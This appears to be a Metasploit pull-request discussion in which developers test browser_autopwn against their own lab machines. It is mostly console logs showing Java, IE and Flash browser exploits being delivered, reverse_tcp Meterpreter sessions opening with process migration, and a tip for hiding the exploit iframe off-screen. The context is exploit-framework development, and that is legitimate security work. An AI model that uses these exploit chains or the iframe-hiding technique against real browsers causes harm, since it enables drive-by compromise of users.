[*] 192.168.1.80     browser_autopwn - Handling '/Shv3lCSIU?sessid=V2luZG93cyBYUDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDpTUDM6ZW4tdXM6eDg2Ok1TSUU6OC4wOg%3d%3d'
[*] 192.168.1.80     browser_autopwn - JavaScript Report: Windows XP:undefined:undefined:undefined:SP3:en-us:x86:MSIE:8.0:
[*] 192.168.1.80     browser_autopwn - Reporting: {"os.product"=>"Windows XP", "os.version"=>"SP3", "os.language"=>"en-us", "os.arch"=>"x86", "os.certainty"=>"0.7"}
[*] 192.168.1.80     browser_autopwn - Responding with 14 exploits
[*] 192.168.1.80     java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.80     java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 192.168.1.80     java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.80     java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 192.168.1.80     java_jre17_jmxbean - handling request for /tPATPrAxK
[*] 192.168.1.80     java_jre17_jmxbean - handling request for /tPATPrAxK/
[*] 192.168.1.80     java_jre17_jmxbean - handling request for /tPATPrAxK
[*] 192.168.1.80     java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.80     java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 192.168.1.80     java_jre17_jmxbean - handling request for /tPATPrAxK/
[*] 192.168.1.80     java_jre17_reflection_types - handling request for /bgKZjkVCBR
[*] 192.168.1.80     java_jre17_reflection_types - handling request for /bgKZjkVCBR/
[*] 192.168.1.80     java_jre17_jmxbean - handling request for /tPATPrAxK
[*] 192.168.1.80     java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.80     java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 192.168.1.80     java_jre17_jmxbean - handling request for /tPATPrAxK/
[*] 192.168.1.80     java_jre17_reflection_types - handling request for /bgKZjkVCBR
[*] 192.168.1.80     java_jre17_reflection_types - handling request for /bgKZjkVCBR/
[*] 192.168.1.80     java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 192.168.1.80     java_jre17_jmxbean - handling request for /tPATPrAxK
[*] 192.168.1.80     java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.80     java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 192.168.1.80     java_jre17_reflection_types - handling request for /bgKZjkVCBR
[*] 192.168.1.80     java_jre17_jmxbean - handling request for /tPATPrAxK/
[*] 192.168.1.80     java_jre17_reflection_types - handling request for /bgKZjkVCBR/
[*] 192.168.1.80     java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 192.168.1.80     java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 192.168.1.80     java_verifier_field_access - Generated jar to drop (5506 bytes).
[*] 192.168.1.80     java_jre17_jmxbean - handling request for /tPATPrAxK
[*] 192.168.1.80     java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.80     java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 192.168.1.80     java_jre17_jmxbean - handling request for /tPATPrAxK/
[*] 192.168.1.80     java_jre17_reflection_types - handling request for /bgKZjkVCBR
[*] 192.168.1.80     java_jre17_provider_skeleton - handling request for /kPCaicsDrcODY
[*] 192.168.1.80     java_jre17_reflection_types - handling request for /bgKZjkVCBR/
[*] 192.168.1.80     java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 192.168.1.80     java_verifier_field_access - Generated jar to drop (5506 bytes).
[*] 192.168.1.80     java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 192.168.1.80     java_jre17_provider_skeleton - handling request for /kPCaicsDrcODY/
[*] 192.168.1.80     java_jre17_jmxbean - handling request for /tPATPrAxK
[*] 192.168.1.80     java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.80     java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 192.168.1.80     java_jre17_reflection_types - handling request for /bgKZjkVCBR
[*] 192.168.1.80     java_jre17_jmxbean - handling request for /tPATPrAxK/
[*] 192.168.1.80     java_jre17_provider_skeleton - handling request for /kPCaicsDrcODY
[*] 192.168.1.80     java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 192.168.1.80     java_verifier_field_access - Generated jar to drop (5506 bytes).
[*] 192.168.1.80     ie_cgenericelement_uaf - Requesting: /swxxWN
[*] 192.168.1.80     ie_cgenericelement_uaf - Target selected as: IE 8 on Windows XP SP3
[*] 192.168.1.80     ie_cgenericelement_uaf - Sending HTML...
[*] 192.168.1.80     java_jre17_reflection_types - handling request for /bgKZjkVCBR/
[*] 192.168.1.80     java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 192.168.1.80     java_jre17_provider_skeleton - handling request for /kPCaicsDrcODY/
[*] Sending stage (770048 bytes) to 192.168.1.80
[*] Meterpreter session 1 opened (192.168.1.64:3333 -> 192.168.1.80:2239) at 2015-02-12 12:12:11 -0600
[*] Session ID 1 (192.168.1.64:3333 -> 192.168.1.80:2239) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (156)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 180
[+] Successfully migrated to process 
```

**Comment by wchen-r7** [comment]
* If you see a Java prompt, that will slow down the javascript a lot. But that also possibly means you have java installed.

* If the status bar says "done", but on msfconsole you're stuck with java modules, that means there was a javascript error (and in my case it's because obfuscation)

* If the status bar says it's still requesting something, exploitation is still alive.

**Comment by jvazquez-r7** [comment]
It is what I see in the browser:

screen shot 2015-02-12 at 12 30 02 pm

Java isn't installed on the target:

screen shot 2015-02-12 at 12 31 08 pm

**Comment by wchen-r7** [comment]
What happens if you click on the X button?

**Comment by wchen-r7** [comment]
I only have a Win 7 SP1 with IE9 box here, seems to be trying just fine.

**Comment by jvazquez-r7** [comment]
@wchen-r7 nothing happens after click on the X button.

**Comment by wchen-r7** [comment]
## Hmmmm...

confused-monkey

**Comment by wchen-r7** [comment]
@jvazquez-r7 The reason you're not getting anything is because......... we don't have anything for BrowserAutoPwn that works for IE10.

**Comment by wchen-r7** [comment]
In other words, we need to update the selection list again, but I think that should be a separate feature request/PR.

**Comment by jvazquez-r7** [comment]
ooo, damnit :( oka, let me try to add some of the flash exploits supporting IE10 and see if they are delivered!!!

**Comment by jvazquez-r7** [comment]
* Added these modules to autopwn: https://github.com/jvazquez-r7/metasploit-framework/commit/0386959bf488c7293ca7c9032f431c13eef89e59

* Run autopwn again:

```
[*] --- Done, found 23 exploit modules

[*] Using URL: http://172.16.158.1:8080/p7YL4BimlGf
[*] Server started.
[*] 172.16.158.135   browser_autopwn - Handling '/p7YL4BimlGf'
[*] 172.16.158.135   browser_autopwn - Handling '/p7YL4BimlGf?sessid=V2luZG93cyA3OnVuZGVmaW5lZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDplbi1VUzp4ODY6TVNJRToxMC4wOg%3d%3d'
[*] 172.16.158.135   browser_autopwn - JavaScript Report: Windows 7:undefined:undefined:undefined:undefined:en-US:x86:MSIE:10.0:
[*] 172.16.158.135   browser_autopwn - Reporting: {"os.product"=>"Windows 7", "os.language"=>"en-US", "os.arch"=>"x86", "os.certainty"=>"0.7"}
[*] 172.16.158.135   browser_autopwn - Responding with 16 exploits
[*] 172.16.158.135   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.135   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.135   java_jre17_jmxbean - handling request for /YuRMPJp
[*] 172.16.158.135   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.135   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.135   java_jre17_jmxbean - handling request for /YuRMPJp/
[*] 172.16.158.135   java_jre17_jmxbean - handling request for /YuRMPJp
[*] 172.16.158.135   java_jre17_reflection_types - handling request for /pmWkIXH
[*] 172.16.158.135   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.135   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.135   java_jre17_reflection_types - handling request for /pmWkIXH/
[*] 172.16.158.135   java_jre17_jmxbean - handling request for /YuRMPJp/
[*] 172.16.158.135   java_jre17_jmxbean - handling request for /YuRMPJp
[*] 172.16.158.135   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.135   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.135   java_jre17_reflection_types - handling request for /pmWkIXH
[*] 172.16.158.135   java_jre17_jmxbean - handling request for /YuRMPJp/
[*] 172.16.158.135   java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 172.16.158.135   java_jre17_reflection_types - handling request for /pmWkIXH/
[*] 172.16.158.135   java_jre17_jmxbean - handling request for /YuRMPJp
[*] 172.16.158.135   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.135   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.135   java_jre17_jmxbean - handling request for /YuRMPJp/
[*] 172.16.158.135   java_jre17_reflection_types - handling request for /pmWkIXH
[*] 172.16.158.135   java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 172.16.158.135   java_verifier_field_access - Generated jar to drop (5506 bytes).
[*] 172.16.158.135   java_jre17_reflection_types - handling request for /pmWkIXH/
[*] 172.16.158.135   java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 172.16.158.135   java_jre17_jmxbean - handling request for /YuRMPJp
[*] 172.16.158.135   java_jre17_reflection_types - handling request for /pmWkIXH
[*] 172.16.158.135   java_jre17_provider_skeleton - handling request for /wiJSNqZsMYpe
[*] 172.16.158.135   java_jre17_jmxbean - handling request for /YuRMPJp/
[*] 172.16.158.135   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.135   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.135   java_jre17_reflection_types - handling request for /pmWkIXH/
[*] 172.16.158.135   java_jre17_provider_skeleton - handling request for /wiJSNqZsMYpe/
[*] 172.16.158.135   java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 172.16.158.135   java_verifier_field_access - Generated jar to drop (5506 bytes).
[*] 172.16.158.135   java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 172.16.158.135   java_jre17_jmxbean - handling request for /YuRMPJp
[*] 172.16.158.135   java_jre17_reflection_types - handling request for /pmWkIXH
[*] 172.16.158.135   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.135   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.135   java_jre17_provider_skeleton - handling request for /wiJSNqZsMYpe
[*] 172.16.158.135   java_jre17_jmxbean - handling request for /YuRMPJp/
[*] 172.16.158.135   java_jre17_reflection_types - handling request for /pmWkIXH/
[*] 172.16.158.135   java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 172.16.158.135   java_verifier_field_access - Generated jar to drop (5506 bytes).
[*] 172.16.158.135   java_jre17_provider_skeleton - handling request for /wiJSNqZsMYpe/
[*] 172.16.158.135   java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 172.16.158.135   adobe_flash_pixel_bender_bof - Gathering target information.
[*] 172.16.158.135   adobe_flash_pixel_bender_bof - Sending response HTML.
[*] 172.16.158.135   adobe_flash_pixel_bender_bof - Request: /WfOoPlbTGuP/iYpbcH/
[*] 172.16.158.135   adobe_flash_pixel_bender_bof - Sending HTML...
[*] 172.16.158.135   adobe_flash_pixel_bender_bof - Request: /WfOoPlbTGuP/iYpbcH/YReaq.swf
[*] 172.16.158.135   adobe_flash_pixel_bender_bof - Sending SWF...
```

This time adobe_flash_pixel_bender_bof is delivered apparently, but there isn't a session back, I don't get a crash neither on IE :\

If I use the module alone:

```
msf exploit(adobe_flash_pixel_bender_bof) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
msf exploit(adobe_flash_pixel_bender_bof) > [*] Using URL: http://172.16.158.1:8080/E0aDEfMMKUF
[*] Server started.
[*] 172.16.158.135   adobe_flash_pixel_bender_bof - Gathering target information.
[*] 172.16.158.135   adobe_flash_pixel_bender_bof - Sending response HTML.
[*] 172.16.158.135   adobe_flash_pixel_bender_bof - Request: /E0aDEfMMKUF/wNPbJN/
[*] 172.16.158.135   adobe_flash_pixel_bender_bof - Sending HTML...
[*] 172.16.158.135   adobe_flash_pixel_bender_bof - Request: /E0aDEfMMKUF/wNPbJN/lUmHCc.swf
[*] 172.16.158.135   adobe_flash_pixel_bender_bof - Sending SWF...
[*] Sending stage (770048 bytes) to 172.16.158.135
[*] 172.16.158.135   adobe_flash_pixel_bender_bof - Target with tag "FuxoaheBrfDaZQVER" wants to retry the module, not allowed.
```

So unexpected behavior with autopwn I think still, but I can land it if you feel comfortable with it. Looks like at least is trying to deliver the exploit now. Kinda undefined behavior for me like user still :(

**Comment by jvazquez-r7** [comment]
Used MATCH option as recommended by @wchen-r7 , still I can't make the target IE to crash neither get sessions with the adobe_flash_pixel_bender_bof even when my installation it's vulnerable for sure :\

```
msf auxiliary(browser_autopwn) > set MATCH adobe_flash_pixel_bender_bof
MATCH => adobe_flash_pixel_bender_bof
msf auxiliary(browser_autopwn) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Auxiliary module execution completed

[*] Setup
msf auxiliary(browser_autopwn) >
[*] Starting exploit modules on host 172.16.158.1...
[*] ---

[*] Starting exploit windows/browser/adobe_flash_pixel_bender_bof with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://172.16.158.1:8080/dcDfBJebo
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Started reverse handler on 172.16.158.1:3333
[*] Starting the payload handler...

[*] --- Done, found 1 exploit modules

[*] Using URL: http://172.16.158.1:8080/LoDBeVlunrGjBPJ
[*] Server started.
[*] 172.16.158.135   browser_autopwn - Handling '/LoDBeVlunrGjBPJ'
[*] 172.16.158.135   browser_autopwn - Handling '/LoDBeVlunrGjBPJ?sessid=V2luZG93cyA3OnVuZGVmaW5lZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDplbi1VUzp4ODY6TVNJRToxMC4wOg%3d%3d'
[*] 172.16.158.135   browser_autopwn - JavaScript Report: Windows 7:undefined:undefined:undefined:undefined:en-US:x86:MSIE:10.0:
[*] 172.16.158.135   browser_autopwn - Reporting: {"os.product"=>"Windows 7", "os.language"=>"en-US", "os.arch"=>"x86", "os.certainty"=>"0.7"}
[*] 172.16.158.135   browser_autopwn - Responding with 1 exploits
[*] 172.16.158.135   browser_autopwn - 172.16.158.135   browser_autopwn - * windows/browser/adobe_flash_pixel_bender_bof
[*] 172.16.158.135   adobe_flash_pixel_bender_bof - Gathering target information.
[*] 172.16.158.135   adobe_flash_pixel_bender_bof - Sending response HTML.
[*] 172.16.158.135   adobe_flash_pixel_bender_bof - Request: /dcDfBJebo/mzEFCL/
[*] 172.16.158.135   adobe_flash_pixel_bender_bof - Sending HTML...
[*] 172.16.158.135   adobe_flash_pixel_bender_bof - Request: /dcDfBJebo/mzEFCL/MpmJk.swf
[*] 172.16.158.135   adobe_flash_pixel_bender_bof - Sending SWF...

```

**Comment by wchen-r7** [comment]
Turns out adobe_flash_pixel_bender_bof hates style="visibility:hidden" from the iframe. If you remove that style properly, here's what it looks like:

```
msf auxiliary(browser_autopwn) > 
[*] Starting exploit modules on host 192.168.1.64...
[*] ---
 
[*] Starting exploit windows/browser/adobe_flash_pixel_bender_bof with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8181/iGfGYxLDFrp
[*]  Local IP: http://192.168.1.64:8181/iGfGYxLDFrp
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Started reverse handler on 192.168.1.64:3333 
[*] Starting the payload handler...
 
[*] --- Done, found 1 exploit modules
 
[*] Using URL: http://0.0.0.0:8181/NV78MWOvcS9mh
[*]  Local IP: http://192.168.1.64:8181/NV78MWOvcS9mh
[*] Server started.
[*] 192.168.1.65     browser_autopwn - Handling '/NV78MWOvcS9mh'
[*] 192.168.1.65     browser_autopwn - Handling '/NV78MWOvcS9mh?sessid=V2luZG93cyA3OnVuZGVmaW5lZDp1bmRlZmluZWQ6dW5kZWZpbmVkOlNQMTplbi1VUzp4ODY6TVNJRToxMS4wOg%3d%3d'
[*] 192.168.1.65     browser_autopwn - JavaScript Report: Windows 7:undefined:undefined:undefined:SP1:en-US:x86:MSIE:11.0:
[*] 192.168.1.65     browser_autopwn - Reporting: {"os.product"=>"Windows 7", "os.version"=>"SP1", "os.language"=>"en-US", "os.arch"=>"x86", "os.certainty"=>"0.7"}
[*] 192.168.1.65     browser_autopwn - Responding with 1 exploits
[*] 192.168.1.65     adobe_flash_pixel_bender_bof - Gathering target information.
[*] 192.168.1.65     adobe_flash_pixel_bender_bof - Sending response HTML.
[*] 192.168.1.65     adobe_flash_pixel_bender_bof - Request: /iGfGYxLDFrp/zofnlw/
[*] 192.168.1.65     adobe_flash_pixel_bender_bof - Sending HTML...
[*] 192.168.1.65     adobe_flash_pixel_bender_bof - Request: /iGfGYxLDFrp/zofnlw/MXpt.swf
[*] 192.168.1.65     adobe_flash_pixel_bender_bof - Sending SWF...
[*] Sending stage (770048 bytes) to 192.168.1.65
```

**Comment by jvazquez-r7** [comment]
Autopwn also isn't playing nice with adobe_flash_regex_value :\ anyway, looks like unrelated to this PR, so landing it.

```
msf auxiliary(browser_autopwn) >
[*] Starting exploit modules on host 172.16.158.1...
[*] ---

[*] Starting exploit windows/browser/adobe_flash_regex_value with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://172.16.158.1:8080/XSAveiPDbMOEl
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Started reverse handler on 172.16.158.1:3333
[*] Starting the payload handler...

[*] --- Done, found 1 exploit modules

[*] Using URL: http://172.16.158.1:8080/Tp2p5zsYMwnv4q
[*] Server started.
[*] 172.16.158.135   adobe_flash_regex_value - Gathering target information.
[*] 172.16.158.135   adobe_flash_regex_value - Sending response HTML.
msf auxiliary(browser_autopwn) > use exploit/windows/browser/adobe_flash_regex_value
msf exploit(adobe_flash_regex_value) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.2:4444
msf exploit(adobe_flash_regex_value) > [*] Using URL: http://0.0.0.0:8080/qTzLG5GpVmwEKsG
[*]  Local IP: http://192.168.0.2:8080/qTzLG5GpVmwEKsG
[*] Server started.
[*] 192.168.0.2      adobe_flash_regex_value - Gathering target information.
[*] 192.168.0.2      adobe_flash_regex_value - Sending response HTML.
[*] 192.168.0.2      adobe_flash_regex_value - Request: /qTzLG5GpVmwEKsG/PwBDmf/
[*] 192.168.0.2      adobe_flash_regex_value - Sending HTML...
[*] 192.168.0.2      adobe_flash_regex_value - Request: /qTzLG5GpVmwEKsG/PwBDmf/swyGL.swf
[*] 192.168.0.2      adobe_flash_regex_value - Sending SWF...
[*] Sending stage (770048 bytes) to 192.168.0.2
[*] Meterpreter session 2 opened (192.168.0.2:4444 -> 192.168.0.2:55220) at 2015-02-12 16:43:57 -0600
[*] Session ID 2 (192.168.0.2:4444 -> 192.168.0.2:55220) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1968)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3428
[*] 192.168.0.2      adobe_flash_regex_value - Target with tag "RqTMlQnOOAjiMRUgDixi" wants to retry the module, not allowed.
[+] Successfully migrated to process
```

**Comment by wchen-r7** [comment]
```style='position: absolute; left: -1000px'``` is a workaround for ```style="visibility:hidden"```, but older IEs don't support this (worst case they can see the iframe).
